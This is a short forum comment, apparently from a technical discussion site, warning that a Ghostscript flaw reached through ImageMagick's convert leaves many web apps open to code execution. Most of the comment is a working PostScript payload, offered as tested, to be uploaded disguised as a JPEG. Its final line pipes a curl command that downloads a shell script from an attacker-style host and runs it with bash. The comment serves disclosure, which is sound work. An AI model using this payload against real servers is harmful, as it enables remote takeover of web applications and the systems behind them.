1 comment

[ 2.9 ms ] story [ 14.3 ms ] thread
This is really critical. ImageMagick's convert uses Ghostscript by default if it detects PDF content, so there are lots of webapps vulnerable now. Is some cases, uploading a test.jpeg with the following text content might be sufficient to execute code on the server (I just tested this on centOS)

   %!PS
   userdict /setpagedevice undef
   legal
   { null restore } stopped { pop } if
   legal
   mark /OutputFile (%pipe%curl http://evilc0rp.co/evil.sh | bash) currentdevice putdeviceprops